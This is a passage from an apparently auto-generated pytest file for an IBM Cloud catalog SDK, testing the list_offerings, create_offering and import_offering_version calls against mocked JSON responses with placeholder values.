{"token": "token", "type": "type"}}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"catalog_identifier": catalog_identifier,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.list_offerings(**req_copy)
class TestCreateOffering():
"""
Test Class for create_offering
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_create_offering_all_params(self):
"""
create_offering()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/offerings')
mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
responses.add(responses.POST,
url,
body=mock_response,
content_type='application/json',
status=201)
# Construct a dict representation of a Rating model
rating_model = {}
rating_model['one_star_count'] = 38
rating_model['two_star_count'] = 38
rating_model['three_star_count'] = 38
rating_model['four_star_count'] = 38
# Construct a dict representation of a Feature model
feature_model = {}
feature_model['title'] = 'testString'
feature_model['description'] = 'testString'
# Construct a dict representation of a Configuration model
configuration_model = {}
configuration_model['key'] = 'testString'
configuration_model['type'] = 'testString'
configuration_model['default_value'] = { 'foo': 'bar' }
configuration_model['value_constraint'] = 'testString'
configuration_model['description'] = 'testString'
configuration_model['required'] = True
configuration_model['options'] = [{ 'foo': 'bar' }]
configuration_model['hidden'] = True
# Construct a dict representation of a Validation model
validation_model = {}
validation_model['validated'] = "2019-01-01T12:00:00Z"
validation_model['requested'] = "2019-01-01T12:00:00Z"
validation_model['state'] = 'testString'
validation_model['last_operation'] = 'testString'
validation_model['target'] = {}
# Construct a dict representation of a Resource model
resource_model = {}
resource_model['type'] = 'mem'
resource_model['value'] = { 'foo': 'bar' }
# Construct a dict representation of a Script model
script_model = {}
script_model['instructions'] = 'testString'
script_model['script'] = 'testString'
script_model['script_permission'] = 'testString'
script_model['delete_script'] = 'testString'
script_model['scope'] = 'testString'
# Construct a dict representation of a VersionEntitlement model
version_entitlement_model = {}
version_entitlement_model['provider_name'] = 'testString'
version_entitlement_model['provider_id'] = 'testString'
version_entitlement_model['product_id'] = 'testString'
version_entitlement_model['part_numbers'] = ['testString']
version_entitlement_model['image_repo_name'] = 'testString'
# Construct a dict representation of a License model
license_model = {}
license_model['id'] = 'testString'
license_model['name'] = 'testString'
license_model['type'] = 'testString'
license_model['url'] = 'testString'
license_model['description'] = 'testString'
# Construct a dict representation of a State model
state_model = {}
state_model['current'] = 'testString'
state_model['current_entered'] = "2019-01-01T12:00:00Z"
state_model['pending'] = 'testString'
state_model['pending_requested'] = "2019-01-01T12:00:00Z"
state_model['previous'] = 'testString'
# Construct a dict representation of a Version model
version_model = {}
version_model['id'] = 'testString'
version_model['_rev'] = 'testString'
version_model['crn'] = 'testString'
version_model['version'] = 'testString'
version_model['sha'] = 'testString'
version_model['created'] = "2019-01-01T12:00:00Z"
version_model['updated'] = "2019-01-01T12:00:00Z"
version_model['offering_id'] = 'testString'
version_model['catalog_id'] = 'testString'
version_model['kind_id'] = 'testString'
version_model['tags'] = ['testString']
version_model['repo_url'] = 'testString'
version_model['source_url'] = 'testString'
version_model['tgz_url'] = 'testString'
version_model['configuration'] = [configuration_model]
version_model['metadata'] = {}
version_model['validation'] = validation_model
version_model['required_resources'] = [resource_model]
version_model['single_instance'] = True
version_model['install'] = script_model
version_model['pre_install'] = [script_model]
version_model['entitlement'] = version_entitlement_model
version_model['licenses'] = [license_model]
version_model['image_manifest_url'] = 'testString'
version_model['deprecated'] = True
version_model['package_version'] = 'testString'
version_model['state'] = state_model
version_model['version_locator'] = 'testString'
version_model['console_url'] = 'testString'
version_model['long_description'] = 'testString'
version_model['whitelisted_accounts'] = ['testString']
# Construct a dict representation of a Deployment model
deployment_model = {}
deployment_model['id'] = 'testString'
deployment_model['label'] = 'testString'
deployment_model['name'] = 'testString'
deployment_model['short_description'] = 'testString'
deployment_model['long_description'] = 'testString'
deployment_model['metadata'] = {}
deployment_model['tags'] = ['testString']
deployment_model['created'] = "2019-01-01T12:00:00Z"
deployment_model['updated'] = "2019-01-01T12:00:00Z"
# Construct a dict representation of a Plan model
plan_model = {}
plan_model['id'] = 'testString'
plan_model['label'] = 'testString'
plan_model['name'] = 'testString'
plan_model['short_description'] = 'testString'
plan_model['long_description'] = 'testString'
plan_model['metadata'] = {}
plan_model['tags'] = ['testString']
plan_model['additional_features'] = [feature_model]
plan_model['created'] = "2019-01-01T12:00:00Z"
plan_model['updated'] = "2019-01-01T12:00:00Z"
plan_model['deployments'] = [deployment_model]
# Construct a dict representation of a Kind model
kind_model = {}
kind_model['id'] = 'testString'
kind_model['format_kind'] = 'testString'
kind_model['target_kind'] = 'testString'
kind_model['metadata'] = {}
kind_model['install_description'] = 'testString'
kind_model['tags'] = ['testString']
kind_model['additional_features'] = [feature_model]
kind_model['created'] = "2019-01-01T12:00:00Z"
kind_model['updated'] = "2019-01-01T12:00:00Z"
kind_model['versions'] = [version_model]
kind_model['plans'] = [plan_model]
# Construct a dict representation of a RepoInfo model
repo_info_model = {}
repo_info_model['token'] = 'testString'
repo_info_model['type'] = 'testString'
# Set up parameter values
catalog_identifier = 'testString'
id = 'testString'
rev = 'testString'
url = 'testString'
crn = 'testString'
label = 'testString'
name = 'testString'
offering_icon_url = 'testString'
offering_docs_url = 'testString'
offering_support_url = 'testString'
tags = ['testString']
keywords = ['testString']
rating = rating_model
created = string_to_datetime('2019-01-01T12:00:00.000Z')
updated = string_to_datetime('2019-01-01T12:00:00.000Z')
short_description = 'testString'
long_description = 'testString'
features = [feature_model]
kinds = [kind_model]
permit_request_ibm_public_publish = True
ibm_publish_approved = True
public_publish_approved = True
public_original_crn = 'testString'
publish_public_crn = 'testString'
portal_approval_record = 'testString'
portal_ui_url = 'testString'
catalog_id = 'testString'
catalog_name = 'testString'
metadata = {}
disclaimer = 'testString'
hidden = True
provider = 'testString'
repo_info = repo_info_model
# Invoke method
response = _service.create_offering(
catalog_identifier,
id=id,
rev=rev,
url=url,
crn=crn,
label=label,
name=name,
offering_icon_url=offering_icon_url,
offering_docs_url=offering_docs_url,
offering_support_url=offering_support_url,
tags=tags,
keywords=keywords,
rating=rating,
created=created,
updated=updated,
short_description=short_description,
long_description=long_description,
features=features,
kinds=kinds,
permit_request_ibm_public_publish=permit_request_ibm_public_publish,
ibm_publish_approved=ibm_publish_approved,
public_publish_approved=public_publish_approved,
public_original_crn=public_original_crn,
publish_public_crn=publish_public_crn,
portal_approval_record=portal_approval_record,
portal_ui_url=portal_ui_url,
catalog_id=catalog_id,
catalog_name=catalog_name,
metadata=metadata,
disclaimer=disclaimer,
hidden=hidden,
provider=provider,
repo_info=repo_info,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 201
# Validate body params
req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
assert req_body['id'] == 'testString'
assert req_body['_rev'] == 'testString'
assert req_body['url'] == 'testString'
assert req_body['crn'] == 'testString'
assert req_body['label'] == 'testString'
assert req_body['name'] == 'testString'
assert req_body['offering_icon_url'] == 'testString'
assert req_body['offering_docs_url'] == 'testString'
assert req_body['offering_support_url'] == 'testString'
assert req_body['tags'] == ['testString']
assert req_body['keywords'] == ['testString']
assert req_body['rating'] == rating_model
assert req_body['created'] == "2019-01-01T12:00:00Z"
assert req_body['updated'] == "2019-01-01T12:00:00Z"
assert req_body['short_description'] == 'testString'
assert req_body['long_description'] == 'testString'
assert req_body['features'] == [feature_model]
assert req_body['kinds'] == [kind_model]
assert req_body['permit_request_ibm_public_publish'] == True
assert req_body['ibm_publish_approved'] == True
assert req_body['public_publish_approved'] == True
assert req_body['public_original_crn'] == 'testString'
assert req_body['publish_public_crn'] == 'testString'
assert req_body['portal_approval_record'] == 'testString'
assert req_body['portal_ui_url'] == 'testString'
assert req_body['catalog_id'] == 'testString'
assert req_body['catalog_name'] == 'testString'
assert req_body['metadata'] == {}
assert req_body['disclaimer'] == 'testString'
assert req_body['hidden'] == True
assert req_body['provider'] == 'testString'
assert req_body['repo_info'] == repo_info_model
@responses.activate
def test_create_offering_required_params(self):
"""
test_create_offering_required_params()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/offerings')
mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
responses.add(responses.POST,
url,
body=mock_response,
content_type='application/json',
status=201)
# Set up parameter values
catalog_identifier = 'testString'
# Invoke method
response = _service.create_offering(
catalog_identifier,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 201
@responses.activate
def test_create_offering_value_error(self):
"""
test_create_offering_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/offerings')
mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
responses.add(responses.POST,
url,
body=mock_response,
content_type='application/json',
status=201)
# Set up parameter values
catalog_identifier = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"catalog_identifier": catalog_identifier,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.create_offering(**req_copy)
class TestImportOfferingVersion():
"""
Test Class for import_offering_version
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_import_offering_version_all_params(self):
"""
import_offering_version()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString/version')
mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
responses.add(responses.POST,
url,
body=mock_response,
content_type='application/json',
status=201)
# Set up parameter values
catalog_identifier = 'testString'
offering_id = 'testString'
tags = ['testString']
target_kinds = ['testString']
content = b'This is a mock byte array value.'
zipurl = 'testString'
target_version = 'testString'
include_config = True
is_vsi = True
repo_type = 'testString'
# Invoke method
response = _service.import_offering_version(
catalog_identifier,
offering_id,
tags=tags,
target_kinds=target_kinds,
content=content,
zipurl=zipurl,
target_version=target_version,
include_config=include_config,
is_vsi=is_vsi,
repo_type=repo_type,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 201
# Validate query params
query_string = responses.calls[0].request.url.split('?',1)[1]
query_string = urllib.parse.unquote_plus(query_string)
assert 'zipurl={}'.format(zipurl) in query_string
assert 'targetVersion={}'.format(target_version) in query_string
assert 'includeConfig={}'.format('true' if include_config else 'false') in query_string
assert 'isVSI={}'.format('true' if is_vsi else 'false') in query_string
assert 'repoType={}'.format(repo_type) in query_string
# Validate body params
req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
assert req_body['tags'] == ['testString']
assert req_body['target_kinds'] == ['testString']
assert req_body['content'] == 'VGhpcyBpcyBhIG1vY2sgYnl0ZSBhcnJheSB2YWx1ZS4='
@responses.activate
def test_import_offering_version_required_params(self):
"""
test_import_offering_version_required_params()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString/version')
mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
responses.add(responses.POST,
url,
body=mock_response,
content_type='application/json',
status=201)
# Set up parameter values
catalog_identifier = 'testString'
offering_id = 'testString'
# Invoke method
response = _service.import_offering_version(
catalog_identifier,
offering_id,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 201
@responses.activate
def test_import_offering_version_value_error(self):
"""
test_import_offering_version_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString/version')
mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": 